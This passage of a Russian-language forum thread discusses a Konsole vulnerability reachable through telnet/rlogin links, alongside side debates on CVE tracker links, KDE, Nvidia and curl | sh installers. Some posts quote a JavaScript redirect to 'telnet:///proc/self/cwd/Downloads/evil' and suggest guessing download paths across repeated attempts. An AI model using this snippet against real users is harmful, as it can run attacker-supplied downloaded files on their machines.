98. Сообщение от Аноним (37), 16-Июн-25, 21:49   +/
>[оверквотинг удален]
>> Если ещё не устранена, то давать прямую ссылку на уязвимую версию
> В этом случае разработчики могут через 5 минут выпустить обновление, а в
> новости будет про то, что уязвимость ещё не исправлена. Информация меняется
> очень бысто, на момент написания новости одна ситуация, а на момент
> её прочтения посетителями может быть уже другой. Тогда уж ставить ссыку
> на состояние пакета и предлагать проверить версию. Но здесь тоже есть
> нюансы, по хорошему нужна информация с экспертизой от самого дистрибутива, так
> как по номеру версии уязвимость может казаться  что есть, а
> по факту в пакете может быть какой-то свой патч, изменение или
> особые настройки, при которых уязвимость не проявляется.

Да, а ещё новость могут прочитать через неделю или через месяц ;)


>> Так всё правильно, CVE текер есть, но ссылка зачем-то на пакет, вопрос зачем, чтобы что-то запостить?
> В Arch стал ставить ссылки на пакет по просбе посетителей, так как
> CVE-страница бывает не отражает фактическое состояние, то по номеру версии проще
> понять, вышло обновление или нет.

Ну, это уже бардак Арча, автору новостей не предлагается чинить этот бардак, предлагалось просто не засовывать сомнительных ссылок в такое однозначно сформулированное предложение ;)

>> Нет, я считаю, что не лучше, потому что в таком виде: "Проследить за устранением
>> уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Arch, FreeBSD." -
>> это просто введение в заблуждение, т.к. по ссылкам не то что заявлено в предложении.
> Ну почему же, проверить номер версии в пакете, зная в какой версии
> уязвимость устранена, вполне себе "Проследить за устранением уязвимости". Могу заменить
> на "Проверить состояние версии или подготовки исправления..." для большей точности.

Можно, но тогда получается самостоятельный какой-то свой ресёрч какой-то уже и это не одно и то же что сформулированно в предложении новости, будто сходи по ссылке и увидишь что как, что отчасти так и есть, т.к. те же Debian, Ubuntu и прочие, имеют явные страницы и они там по делу, а вот Fedora и Arch лучше бы просто вынести за скобки того предложения, как тех, кто практикует отсутствие порядка и полагается на творческий беспорядок.

Автору не предлагается решать проблемы этих дистров по оформлению информации по CVE, предложение касается того, что по ссылке на Fedora, Arch и прочие "отлынивающие" не должны стоять в том предложении в одном ряду с Debian, Ubuntu и остальными, с ссылками которых всё в порядке и они соответствуют заявленному. Оформлять можно хоть разными предложениями и в разных абзацах, даже с упоминанием, что вот эти редиски не оформляют инфомацию по CVE как вот эти сознательные граждане, поэтому если кому интересно, то можете поиграться с ними в прятки на их ресурсах, авось повезёт! xD


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70

99. Сообщение от Аноним (99), 16-Июн-25, 21:49   –1 +/
>единственная надежда у поклонников проекта кде заключается в том, что Габен и ко. возьмут кодовую базу этой СРС под свой контроль, то есть под контроль программистов на зарплате

Нет, ненадо, такой "надежды" не питаю. Ненадо ничего выпиливать из интерфейса KDE. Меня, как пользователя KDE, больше устраивает то, как организована разработка у ний сейчас. Без погромистов на зарплате Габена.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

100. Сообщение от Аноним (99), 16-Июн-25, 21:53   +/
А поклонники у вас советов просят?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #84 Ответы: #101

101. Сообщение от Аноним (102), 16-Июн-25, 22:08   +/
совет поросят эти поклонники
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #100

102. Сообщение от Аноним (102), 16-Июн-25, 22:10   +/
т.е. мочить надо бинарник konsole...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86

103. Сообщение от myster (ok), 16-Июн-25, 22:38   +/
> Браузер лишь передаёт аргумент konsole, и ему совершенно не известно
> ...
> Откуда браузеру знать, во что раскроется эта команда?

Ты реально думаешь, что браузер живой? надеюсь не под веществами пишешь.

Ты сам ответил себе же:
> И будет там что-то вроде
> konsole 'telnet:///proc/self/cwd/Downloads/evil'

это и есть мой посыл, вместо сообщения "Я сейчас открою неведомую шнягу, хотите?", браузеры должны писать "Я сейчас передам вот такие параметры командной строки ... хотите?".

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86 Ответы: #111

105. Сообщение от oficsu (ok), 16-Июн-25, 23:47   +/
Может, у этих дистрибутивов нет трекеров CVE и единственный способ отслеживать исправления — смотреть список изменений конкретных пакетов?

> По Арчу, не лучше картина кстати, там просто ссылка на пакет, никакого статус работы над уязвимостью в той ссылке нет

По той ссылке есть кнопочка "View Changes", откуда и можно узнать о факте исправления

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37

107. Сообщение от Аноним (99), 17-Июн-25, 08:19   +/
Да там ещё много чего невозможно: и то невозможно, и это невозможно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49

108. Сообщение от Аноним (55), 17-Июн-25, 10:32   +/
>связанная с нелинейным характером зависимости сложности системы от размера кодовой базы

Будь зависимость линейна, прогресс давным давно бы остановился, так как новые вещи были бы слишком сложными.
>Вопрос в том, сколько на решение частного случая проблемы 1,5% пользователей должна потратить компания

Вы удивительны - вам жалко многомиллиардную компанию, что ей, бедной несчастной, оказывается надо деньги тратить, на качество товара. Удивительно, как это интел и амд справляются? Только вот чем больше пользователи прощают компании проблем, тем меньше она будет в качество своего товара вкладываться. Разъёмы горят(https://habr.com/ru/companies/x-com/articles/899528/) - ничего страшного. Драйвера окирпичивают карты(https://habr.com/ru/companies/x-com/articles/892620/) - нормально. Самое главное, что невидия ни цента на вейленд не потратила.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #71 Ответы: #118

109. Сообщение от Аноним (73), 17-Июн-25, 10:34   +/
Наверное прощще, примерно как xfce прощще Kde, или как Lxqt, lxde, прощще Kde.
Думаю так.
Или как просмотрщик изображений прощще фотошоп.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80

110. Сообщение от Аноним (55), 17-Июн-25, 10:36   +/
Я рекомендую всё же выходить из криокамеры, для того, чтобы иметь хотя бы какое-то представление о реальности. Заходим, например, на https://code.visualstudio.com/docs/setup/linux#_install-vs-c...

И там нас встречает sudo apt install ./<file>.deb

Никакими ни контрольными суммами, ни версиями, ничем даже и не пахнет. Это уже потом, после установки, деб пакет пропишет нормальный репозиторий, а сейчас, он ничем принципиально не отличается от curl | sh.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94 Ответы: #112

111. Сообщение от Аноним (55), 17-Июн-25, 10:43   –1 +/
>это и есть мой посыл

Какой посыл? Проблема не в открытии сторонних программ, проблема в обработке этими программами своих аргументов.
>Я сейчас открою неведомую шнягу, хотите?

Konsole - неведомая программа?
>Ты реально думаешь, что браузер живой?

Даже неживой браузер должен вывести какую-то строку. Нет абсолютно никакого смысла задалбывать пользователя сообщениями. У них и так уже банерная слепота развивается.
>браузеры должны писать "Я сейчас передам вот такие параметры командной строки

А вы уверены, что konsole запускается напрямую браузером? Скорее всего, между браузером и konsole есть как минимум одна абстракция.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103 Ответы: #119

112. Сообщение от bdrbt (ok), 17-Июн-25, 10:43   +/
Ты хоть распакуй его, да посмотри.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #110

113. Сообщение от fidoman (ok), 17-Июн-25, 10:49   +/
bash да, отличная замена для ssh.
В каких головах такие технические решения рождаются?
Просто чтобы не заморачиваться с сообщением об ошибке пользователю что ли?
Ответить | Правка | Наверх | Cообщить модератору

114. Сообщение от BeLord (ok), 17-Июн-25, 10:59   +/
Вполне возможно, терять информацию это тренд современности-)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39

115. Сообщение от Аноним (64), 17-Июн-25, 11:02   +/
>> не слишком окаменелой версии
> тот дебиян еще не слишком релизнулся

И кто ж виноват, что дебиановцы такие слоупоки?

>> опять в дурных "привычках" виноваты другие?
> ну таки на сайте раста так первым же делом написано, а они небезопасного не посоветуют и не сделают

Э-э ... и что они должны там предлагать, если юзер, вместо скачивания из штатной репы, пришел туда? Готовый deb/rpm/еще пяток форматов, потому что готовый деб из "левой" репы 100500 секурнее? Или вызваться мейнтенить пяток реп самых популярных дистров?

Спецом для таких там, кстати, написано:


That page describes installation via rustup, a tool that manages multiple Rust toolchains in a consistent way across all platforms Rust supports. Why might one not want to install using those instructions?

    Offline installation. rustup downloads components from the internet on demand. If you need to install Rust without access to the internet, rustup is not suitable.
    Preference for the system package manager. On Linux in particular, but also on macOS with Homebrew, MacPorts or pkgsrc, and Windows with Chocolatey or Scoop, developers sometimes prefer to install Rust with their platform’s package manager.
    Preference against curl | sh. On Unix, we usually install rustup by running a shell script via curl. Some have concerns about the security of this arrangement and would prefer to download and run the installer themselves.
    Validating signatures. Although rustup performs its downloads over HTTPS, the only way to verify the signatures of Rust installers today is to do so manually with the standalone installers.


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72

116. Сообщение от Аноним (55), 17-Июн-25, 12:53   +/
Вам надо - вы и отключайте. Или поместите браузер в контейнер, благо это элементарно делается.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #97

118. Сообщение от User (??), 17-Июн-25, 16:10   +/
>>связанная с нелинейным характером зависимости сложности системы от размера кодовой базы
> Будь зависимость линейна, прогресс давным давно бы остановился, так как новые вещи
> были бы слишком сложными.

Ну... "Если бы земля была круглой - мы бы с неё падали!" - тоже вывод, в общем-то. Даже я бы сказал, логичный.

>>Вопрос в том, сколько на решение частного случая проблемы 1,5% пользователей должна потратить компания
> Вы удивительны - вам жалко многомиллиардную компанию, что ей, бедной несчастной, оказывается
> надо деньги тратить, на качество товара. Удивительно, как это интел и
> амд справляются? Только вот чем больше пользователи прощают компании проблем, тем
> меньше она будет в качество своего товара вкладываться. Разъёмы горят(https://habr.com/ru/companies/x-com/articles/899528/)
> - ничего страшного. Драйвера окирпичивают карты(https://habr.com/ru/companies/x-com/articles/892620/)
> - нормально. Самое главное, что невидия ни цента на вейленд не
> потратила.

Удивительная ситуация - люди вроде как умеют писать (Совершеннейшую ерунду, как правило. О том, как "хорошо" справляется с обеспечением качества Intel разве что в криокамере не прокричали), но совершенно не умеют читать. Нет, отдельные буквы и даже слова таки да - а вот с пониманием смысла прочитанного - проблемочки. Вас в третий раз спрашивают - СКОЛЬКО ПО ВАШЕМУ МНЕНИЮ Nvidia ДОЛЖНА ПОТРАТИТЬ НА РЕШЕНИЕ ПРОБЛЕМЫ? А вы вместо ответа на вопрос делаете изумительные выводы о мотивации собеседника.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #108

119. Сообщение от myster (ok), 17-Июн-25, 18:20   +/
не важно что там есть, читаем код, который приводит к сообщению "Allow this site to open the telnet link with KTelnetService?":
```
            setTimeout(() => {
                window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
            }, 1000);
```

так почему в сообщении браузер нам пишет отсебятину, когда должен писать про "proc/self/cwd/Downloads/evil". Это уязвимость, т.к. браузер пишет отсебятину.

В данном случае не важно, что в системе или в настройках браузера ассоциировано с telnet протоколом, браузер во всех случаях должен отображать явно то, что собирается запустить, а не то, что по мнениюю кого-то из разработчиков веб-браузера уместно. Эти разработчики неправы.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #111

120. Сообщение от Аноним (120), 17-Июн-25, 23:12   +/
процфс тут нужна, только? чтобы не гадать путь до хомяка. Если мы по каким либо причинам знаем логин юзера (или предполагаем его) то /home/$USER/Downloads/ даст 90% попадание, что в линуксе, что во фре. процфс конечно надёжнее. но при отсутствии гербовой можно писать и на обычной бумаге. тем более что никто же не запрещает сделать N или даже M попыток. В этом плане раньше в винде было хорошо, ни один иностранный хацкер не выговорит "Загрузки" ;) Но теперь там c:\users\$USER\Downloads во всех языках.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #65

121. Сообщение от Аноним (121), 18-Июн-25, 08:47   +/
Не работает, Konsole 24.08.1. Упорно вылетает окошко portal "Choose an application to open 'rlogin'", в /tmp ничего нового не появляется..
Ответить | Правка | Наверх | Cообщить модератору

122. Сообщение от Аноним (122), 18-Июн-25, 09:32   +/
Блин, я думал это фича о_О
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #66


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру